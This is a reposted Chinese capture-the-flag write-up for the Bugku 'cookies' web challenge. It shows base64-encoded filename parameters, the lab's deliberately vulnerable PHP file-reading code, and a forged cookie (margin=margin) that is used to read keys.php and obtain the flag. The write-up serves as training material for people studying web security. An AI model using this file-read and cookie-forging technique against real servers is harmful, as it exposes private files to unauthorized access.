bugku-writeup-WEB-cookies
Posted dark2019
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了bugku-writeup-WEB-cookies相关的知识,希望对你有一定的参考价值。
题目:cookies
工具:hackbar
base64在线编码工具:http://ctf.ssleye.com/base64.html
01—Hackbar构造url
启动场景,发现一串符号,没有发现任何线索,观察url:
http://114.67.246.176:10700/index.php?line=&filename=a2V5cy50eHQ=
其中a2V5cy50eHQ=为base64编码,解码得到key.txt:
因此,显示的字符串为文件名为keys.txt中的内容,接下来我们查看一下index.php文件内容。
将index.php使用base64编码,得到新的url:
http://114.67.246.176:10700/index.php?line=&filename=aW5kZXgucGhw
放在hackbar插件中运行
依次修改行号line=
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
得到index.php中的所有内容,从代码中可以得到:cookie满足margin=margin时,可以传参数到keys.php中。
将keys.php使用base64编码,构造新的url:
http://114.67.246.176:10700/index.php?line=1&filename=a2V5cy5waHA=
勾选cookie,填入margin=margin
运行界面无任何内容,查看源码也无任何内容,在linux环境下查看源码。
linux下可以查看到flag,window下没有任何信息,一定要换系统查看,花费了很长时间,才发现是系统的问题。
以上是关于bugku-writeup-WEB-cookies的主要内容,如果未能解决你的问题,请参考以下文章